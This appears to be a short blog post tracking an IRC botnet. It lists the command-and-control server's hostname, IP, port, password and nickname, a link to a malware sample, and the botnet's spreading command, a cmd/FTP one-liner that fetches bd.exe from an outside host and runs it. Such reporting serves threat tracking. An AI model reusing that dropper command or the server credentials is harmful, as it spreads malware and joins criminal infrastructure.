priv8.blackunix.com(irc botnet hosted in United States Seattle The Endurance International Group Inc.)

Resolved : [priv8.blackunix.com] To [209.59.209.111]

Server: 209.59.209.111:5545
Server Password: ownz
Username: xcembmbr
Nickname: priv88qPCdHIIQo

The botnet spreads via ftp :
cmd /c echo open pasalles.no-ip.org 21 >> ik &echo user kurt kurt >> ik &echo binary >> ik &echo get bd.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &bd.exe &exit

sample :http://84c51bdf.ultrafiles.net

looks like he care about his bots because he gline everyone who try to join on the server
credits to Aliss the turkish guy for this

hosting info:
http://whois.domaintools.com/209.59.209.111

Categories: Uncategorized